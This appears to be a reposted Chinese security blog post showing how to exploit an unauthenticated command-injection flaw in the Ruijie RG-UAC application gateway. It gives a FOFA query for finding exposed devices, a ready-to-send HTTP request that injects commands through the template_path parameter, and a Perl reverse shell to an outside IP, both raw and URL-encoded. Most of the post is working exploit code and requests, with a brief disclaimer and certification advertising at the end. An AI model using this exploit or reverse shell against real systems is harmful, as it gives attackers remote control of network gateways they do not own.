锐捷RG-UAC应用网关-前台RCE漏洞复现反弹shell实战

锐捷RG-UAC应用网关-前台RCE漏洞复现反弹shell实战
2023-12-10 08:32:34 Author: 潇湘信安(查看原文) 阅读量:49 收藏

声明：该公众号大部分文章来自作者日常学习笔记，也有部分文章是经过作者授权和其他公众号白名单转载，未经授权，严禁转载，如需转载，联系开白。

请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关。

现在只对常读和星标的公众号才展示大图推送，建议大家把潇湘信安“设为星标”，否则可能看不到了！

0x01 漏洞概述

锐捷RG-UAC应用管理网关nmc_sync.php接口处存在命令执行漏洞，未经身份认证的攻击者可执行任意命令控制服务器权限。

0x02 复现环境

FOFA：app="Ruijie-RG-UAC"

0x03 漏洞复现

POC：

GET /view/systemConfig/management/nmc_sync.php?center_ip=127.0.0.1&template_path=|whoami%20>test.txt|cat HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Accept-Encoding: gzip

验证

GET /view/systemConfig/management/test.txt HTTP/1.1Host: your-ipAccept-Encoding: gzipUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

0x04 反弹shell

安全设备的Linux很多命令是没有的，经过测试后发现只有Perl能反弹shell，在 https://revshells.isisy.com 网站生成Perl的反弹shell。

原始的反弹shell如下，在BurpSuite中需要URL编码，方法是选中，然后Ctrl+U快捷键编码即可。

perl -e 'use Socket;$i="121.*.***.*";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

最终使用Perl反弹shell的POC如下：

GET /view/systemConfig/management/nmc_sync.php?center_ip=127.0.0.1&template_path=|perl+-e+'use+Socket%3b$i%3d"121.*.***.*"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b' HTTP/1.1Host: ***.**.***.**:****User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: PHPSESSID=c73e6c1766d9a1173ac820cb22dad128Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1

关注我们

还在等什么？赶紧点击下方名片开始学习吧！

信安考证

需要考以下各类安全证书的可以联系我，价格优惠、组团更便宜，还送【潇湘信安】知识星球1年！

CISP、PTE、PTS、DSG、IRE、IRS、NISP、PMP、CCSK、CISSP、ISO27001...

推荐阅读

文章来源: http://mp.weixin.qq.com/s?__biz=Mzg4NTUwMzM1Ng==&mid=2247507703&idx=1&sn=d4317318d9ba6ee1c88604d1f0c4ad41&chksm=cfa57ae4f8d2f3f23a995c12df20f78d6e46e82f7266f403220c3d409cc6a2caee99028df016&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh